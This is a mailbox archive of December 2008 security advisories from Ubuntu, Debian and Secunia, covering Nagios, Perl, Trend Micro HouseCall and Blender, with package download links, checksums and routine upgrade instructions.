Vulnerability   
Search   
    Search 219043 CVE descriptions
and 99761 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-698-1          December 22, 2008
nagios vulnerability
CVE-2008-5027
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  nagios-common                   2:1.3-cvs.20050402-8ubuntu8

After a standard system upgrade you need to restart Nagios to effect
the necessary changes.

Details follow:

It was discovered that Nagios did not properly parse commands submitted using
the web interface. An authenticated user could use a custom form or a browser
addon to bypass security restrictions and submit unauthorized commands.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402-8ubuntu8.diff.gz
      Size/MD5:    70914 96d8036bdb33aadd3141715039c91b24
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402-8ubuntu8.dsc
      Size/MD5:      959 0393336015bf452f5dfeb74d75245311
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402.orig.tar.gz
      Size/MD5:  1621251 0f92b7b8e705411b7881d3650cbb5d56

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-common_1.3-cvs.20050402-8ubuntu8_all.deb
      Size/MD5:  1218132 d18e298ee16f4c6c6b7c5969c46044e6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1030206 085483fdefd0d7bc43e55dbc5be2bcd6
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1041656 09fc7bb2ff11062603680d09e290909b
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1025618 61619d13effd9a4970486abf5933c756

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   877846 544afaebec24e7e94d2ce1da3a89346c
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   886544 411d3ca5a204aa41a4a42ef6e5f56453
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   872936 aa31f6d1fb8a081a206eae3d6bfb3dd6

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:  1015630 540a27062c7f8612b7f460b2bcfd93b9
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:  1024374 47e0480006df0b20a83f67b56da7a9f8
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:   993324 03a67a7675075050a672a4c515e8e0c3

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   918810 7340348f043dd884c88bd016ee30e41d
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   926172 e9ccf388b828a17e868807aa39cb5b51
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   917374 c88dec0d93f590f8a93ebbc701696f68



--=-8LLLPFZXuFgeDvsoXmCd
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAklPpccACgkQLMAs/0C4zNpo0QCgj3got0/fA54JEE3r7V0OKpcd
pnMAni9+CEXeT1lKpcrf+kG2OkubVK8R
=ayx5
-----END PGP SIGNATURE-----

--=-8LLLPFZXuFgeDvsoXmCd--

From - Mon Dec 22 12:39:53 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38988-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 6E8E1ED1FE
for <lists@securityspace.com>; Mon, 22 Dec 2008 12:39:17 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id AA9BB14377F; Mon, 22 Dec 2008 09:52:11 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29154 invoked from network); 21 Dec 2008 09:45:34 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: using cached result; rate: -6.1
From: Florian Weimer <fw@deneb.enyo.de>
Date: Sun, 21 Dec 2008 11:04:41 +0100
Message-ID: <871vw19746.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-8.58 tagged_above=3.6 required=5.3
tests=[FOURLA=0.1, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1678-2] New perl packages fix regression
Priority: urgent
Resent-Message-ID: <EPXHxNTbfBG.A.DKB.HThTJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sun, 21 Dec 2008 10:04:55 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1678-2                  security@debian.org
http://www.debian.org/security/                         Florian Weimer
December 21, 2008                   http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : perl
Vulnerability  : design flaws
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-5302 CVE-2008-5303
Debian Bug     : 286905 286922 479317

The perl update in DSA-1678-1 contains a regression which is triggered
by some Perl scripts which have changed into the directory tree
removed by File::Path::rmtree.  In particular, this happens if
File::Temp::tempdir is used.  This new update corrects this
regression.

For the stable distribution (etch), this problem has been fixed in
version 5.8.8-7etch6.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your perl packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6.diff.gz
    Size/MD5 checksum:   104841 38685bce67f7761753883e8e6073f5b7
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6.dsc
    Size/MD5 checksum:      742 f9545587e032939494a6a9b22abd112c
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8.orig.tar.gz
    Size/MD5 checksum: 12829188 b8c118d4360846829beb30b02a6b91a7

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.8-7etch6_all.deb
    Size/MD5 checksum:  7377460 cf3c6b08cfa947eb989e5a376790c4c3
  http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.8-7etch6_all.deb
    Size/MD5 checksum:    41276 f9e491829ef0ea295d2c5b88e48c895d
  http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.8-7etch6_all.deb
    Size/MD5 checksum:  2328214 6d995effacda8ecc2a935dc4527ed342

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_alpha.deb
    Size/MD5 checksum:  4150250 3c575d6d8e1b101066a89e1482f081cf
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_alpha.deb
    Size/MD5 checksum:   821806 8d3bd143f7b3d6243b42277c5c63a93f
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_alpha.deb
    Size/MD5 checksum:   880284 5636ce04377a056db7d369b7b8770428
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_alpha.deb
    Size/MD5 checksum:  2928840 4d5717f310740a654eab999bc4993e5a
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_alpha.deb
    Size/MD5 checksum:     1010 9ccd001ddccacbf99510508937c9ca47
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_alpha.deb
    Size/MD5 checksum:    36236 db6be7a7cf887edfefcb7c2c50b0a3db

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_amd64.deb
    Size/MD5 checksum:     1014 6222c5da15781a0191a162ee74e0f9a2
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_amd64.deb
    Size/MD5 checksum:   806670 c654435b6632fb800929870df3f0daf8
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_amd64.deb
    Size/MD5 checksum:    32780 bcc928299ffd2e4d97ee2d9d7fdb1512
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_amd64.deb
    Size/MD5 checksum:  4249060 a10ee694a5d164b8ef12d0f566e4f02d
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_amd64.deb
    Size/MD5 checksum:   630778 f318294099b5c0ae4469073988731f7f
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_amd64.deb
    Size/MD5 checksum:  2735120 21c2ed7bba2de01983156e720c4eea14

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_arm.deb
    Size/MD5 checksum:    30346 1f51b45f45fd8a1bbc4732812c348b3a
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_arm.deb
    Size/MD5 checksum:   760238 a230824f93118e65af853c9a8448aeb5
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_arm.deb
    Size/MD5 checksum:   562086 e7fc6a0323bc5898dd09ff7a9c937ac1
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_arm.deb
    Size/MD5 checksum:     1010 9a67f67e98a45b6e02fe09aa50518794
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_arm.deb
    Size/MD5 checksum:  2548186 91c5ccb36e82705931c07d8a14d95490
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_arm.deb
    Size/MD5 checksum:  3410336 77df1024bf9e02b0cdce65423bc84eeb

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_i386.deb
    Size/MD5 checksum:  2492644 ebb57292ae6986f812c2233511565fb3
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_i386.deb
    Size/MD5 checksum:   585446 bedf9d40486ebab6ef251101ed0d2402
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_i386.deb
    Size/MD5 checksum:   762766 f667327e7cd4044ee6fb3c900b75a181
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_i386.deb
    Size/MD5 checksum:   527166 8770a7e8302aaa2ef7c99b8339a1579e
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_i386.deb
    Size/MD5 checksum:    32104 53085baadd6fa2a16f5ca27dbcae5b72
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_i386.deb
    Size/MD5 checksum:  3599182 6c141bd9447670a86b0691adafb51596

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_ia64.deb
    Size/MD5 checksum:  1154160 b640fe2f395f9161560fd9dd52532f85
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_ia64.deb
    Size/MD5 checksum:     1006 62ffe7a5b8823f925b2537941fe48ae1
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_ia64.deb
    Size/MD5 checksum:    51272 b93cfd432ead7fb85cab0acbe53c2994
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_ia64.deb
    Size/MD5 checksum:   978108 7e50dafffed7382b35042ad86032b7a4
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_ia64.deb
    Size/MD5 checksum:  4336650 fe46d1d4fa0b18770631f9d2a544d072
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_ia64.deb
    Size/MD5 checksum:  3364466 15f332c898209c5c5cb8d864762cf445

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_mips.deb
    Size/MD5 checksum:   786168 5da358d316af22485a29c364afee453c
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_mips.deb
    Size/MD5 checksum:     1008 0c27fb854eabf1e73840bf2cc07b8b3c
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_mips.deb
    Size/MD5 checksum:   694016 78af4921744de0e03ba173d79d7f7d39
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_mips.deb
    Size/MD5 checksum:    32220 fcd144768fee4a14664a962d0d1e4a55
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_mips.deb
    Size/MD5 checksum:  3679064 cdd8810ba2b3e8c293df4acc06510fb7
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_mips.deb
    Size/MD5 checksum:  2782124 a16a21e716647c74c24224b9752d56c2

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_mipsel.deb
    Size/MD5 checksum:    32326 55417bfc7195b2907c76a170ded4fb91
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_mipsel.deb
    Size/MD5 checksum:  2730626 7d13f3931edcdd3b22ff6e851de332d5
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_mipsel.deb
    Size/MD5 checksum:  3413592 f087bc2dcefcd3069ac7db96b84af4ab
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_mipsel.deb
    Size/MD5 checksum:   784946 a5b574a6e9e1bf919ab88bd1b5beb964
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_mipsel.deb
    Size/MD5 checksum:   687508 90078c3c9692c6e50c5a5cb0fe25ece2
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_mipsel.deb
    Size/MD5 checksum:     1016 10942b8d2f2c5441d0dd7d65afc83151

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_powerpc.deb
    Size/MD5 checksum:   811106 367dec1df2404742380c2c06e0809a20
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_powerpc.deb
    Size/MD5 checksum:  2710134 50f1c3ecb9f1023935f153c1d605aa41
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_powerpc.deb
    Size/MD5 checksum:     1014 16877860b93d044bf7f914a857737fc0
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_powerpc.deb
    Size/MD5 checksum:  3825218 b4f50f6735fc446fb22665cff53cd064
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_powerpc.deb
    Size/MD5 checksum:   653450 92671c8bcd39e6f4a84b2a01401ef408
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_powerpc.deb
    Size/MD5 checksum:    32904 adb2e70ca2b2f0cc809bcc2903036bdf

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_s390.deb
    Size/MD5 checksum:  4100084 14bc00f090ce3dc1ba7bfacfa5b88218
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_s390.deb
    Size/MD5 checksum:    33094 fb66e60a4fa21a647bc053920a842d5b
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_s390.deb
    Size/MD5 checksum:   633600 9df5a899f601a14ce3b0496df2bc116d
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_s390.deb
    Size/MD5 checksum:   823704 1b3f1afaef5fc0c5fb36048d82c1c3d6
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_s390.deb
    Size/MD5 checksum:  2796566 83e073cf9d1f2a22f366483d250a95c0
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_s390.deb
    Size/MD5 checksum:     1008 f983117eb556d27b343d6a64d5774cfd

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch6_sparc.deb
    Size/MD5 checksum:   594470 8bfdaa1611e2ce31f21dcb83714eed1f
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch6_sparc.deb
    Size/MD5 checksum:    31058 12713b89c5b12616fe4344c6e725b8a5
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch6_sparc.deb
    Size/MD5 checksum:  2565978 b062a3274b40bf1524a9d02315c711cd
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch6_sparc.deb
    Size/MD5 checksum:   782402 5c2d4e8b4eb521aecac7c496591c1e7a
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch6_sparc.deb
    Size/MD5 checksum:     1010 0fde672bbaad262571d8646364b3c10a
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch6_sparc.deb
    Size/MD5 checksum:  3813262 f1095b35b28e4d2eb80cba8b978d8119


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJThLvAAoJEL97/wQC1SS+WSYIAI0vvTnjN/DDAhxatTQhcqft
M4KlTjE5xLF1qtLH+9XWmCf9nPGQyOfrZk8lRyAVG3xyI4shuMrRIrZlgW70Z9rk
C5p0ApU81yIWEMXQI/OIawbx0gXqg5O26KMQHWYNOflXfg7P/S3PrlVRgtJeG3ED
QptsDATvJaIFOBN/QGENr0vpJ70kxlO8xB/YqiRXecBVDBywL4xK6mDg11q3ZEt5
2v+hn4by0mhd29xQz2rq0tG2K+xWidQd6UsbvekhAVBhzonH2fPgZX5YaqxT5m6i
hAtwMXAnPIJXK1FWzEK0kdWuULkcNdXF5rKZnYgILF7opiXbzylPKwQmbK8biUA=ttG8
-----END PGP SIGNATURE-----

From - Mon Dec 22 12:49:49 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38987-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F37E5ED1FF
for <lists@securityspace.com>; Mon, 22 Dec 2008 12:47:54 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id CAA85143747; Mon, 22 Dec 2008 09:52:03 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28317 invoked from network); 21 Dec 2008 08:28:37 -0000
Date: Sun, 21 Dec 2008 09:47:09 +0100
Message-Id: <200812210847.mBL8l92c028134@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Trend Micro HouseCall "notifyOnLoadNative()" Vulnerability
From: Secunia Research <remove-vuln@secunia.com>
Status:   

=====================================================================
                     Secunia Research 21/12/2008

    - Trend Micro HouseCall "notifyOnLoadNative()" Vulnerability -

=====================================================================Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================1) Affected Software 

* Trend Micro HouseCall ActiveX Control 6.51.0.1028 and 6.6.0.1278

NOTE: Other versions may also be affected.

=====================================================================2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================3) Vendor's Description of Software 

"Trend Micro� HouseCall is an application for checking whether your 
computer has been infected by viruses, spyware, or other malware. 
HouseCall performs additional security checks to identify and fix 
vulnerabilities to prevent reinfection."

Product Link:
http://housecall.trendmicro.com/

=====================================================================4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Trend Micro 
HouseCall, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused by a use-after-free error in the HouseCall
ActiveX control (Housecall_ActiveX.dll). This can be exploited to 
dereference previously freed memory by tricking the user into opening 
a web page containing a specially crafted "notifyOnLoadNative()"
callback function.

Successful exploitation allows execution of arbitrary code.

=====================================================================5) Solution 

Remove the ActiveX control and install version 6.6.0.1285.
http://prerelease.trendmicro-europe.com/hc66/launch/

HouseCall Server Edition:
Apply hot fix B1285.

=====================================================================6) Time Table 

25/08/2008 - Vendor notified.
26/08/2008 - Vendor response.
21/12/2008 - Public disclosure.

=====================================================================7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

=====================================================================8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2435 for the vulnerability.

=====================================================================9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-34/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Mon Dec 22 12:59:45 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38999-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id EAD6BED200
for <lists@securityspace.com>; Mon, 22 Dec 2008 12:53:46 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 916761439C6; Mon, 22 Dec 2008 09:55:20 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31946 invoked from network); 22 Dec 2008 14:20:54 -0000
Subject: [USN-699-1] Blender vulnerabilities
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -3.9
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.69.0.124
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-dWne1r536o2HA/issnOR"
Date: Mon, 22 Dec 2008 09:34:43 -0500
Message-Id: <1229956483.23276.6.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.2 
Status:   


--=-dWne1r536o2HA/issnOR
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-699-1          December 22, 2008
blender vulnerabilities
CVE-2008-1102, CVE-2008-4863
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  blender                         2.41-1ubuntu4.1

After a standard system upgrade you need to restart Blender to effect
the necessary changes.

Details follow:

It was discovered that Blender did not correctly handle certain malformed
Radiance RGBE images. If a user were tricked into opening a .blend file
containing a specially crafted Radiance RGBE image, an attacker could execute
arbitrary code with the user's privileges. (CVE-2008-1102)

It was discovered that Blender did not properly sanitize the Python search
path. A local attacker could execute arbitrary code by inserting a specially
crafted Python file in the Blender working directory. (CVE-2008-4863)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/b/blender/blender_2.41-1ubuntu4.1.diff.gz
      Size/MD5:    25321 a6a2c9e48b5c274d1744d740b0d0501e
    http://security.ubuntu.com/ubuntu/pool/main/b/blender/blender_2.41-1ubuntu4.1.dsc
      Size/MD5:      947 2c501e9883db205fab612b6cd7b50d27
    http://security.ubuntu.com/ubuntu/pool/main/b/blender/blender_2.41.orig.tar.gz
      Size/MD5:  9464385 f6b54ff73c37aaca4d3f5babdd156fbf

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/b/blender/blender_2.41-1ubuntu4.1_amd64.deb
      Size/MD5:  5399852 ee9c0adcf8fb0cf7021dd3d5132dab41

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/b/blender/blender_2.41-1ubuntu4.1_i386.deb
      Size/MD5:  4848820 f68c68e0db4b4ea0b7c8eed29217e398

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/b/blender/blender_2.41-1ubuntu4.1_powerpc.deb
      Size/MD5:  5467466 aee78b058760935e9cbe92e069c3ae19

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/b/blender/blender_2.41-1ubuntu4.1_sparc.deb
      Size/MD5:  5110704 5f03470392a9c258d2116995b0a6e605



--=-dWne1r536o2HA/issnOR
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

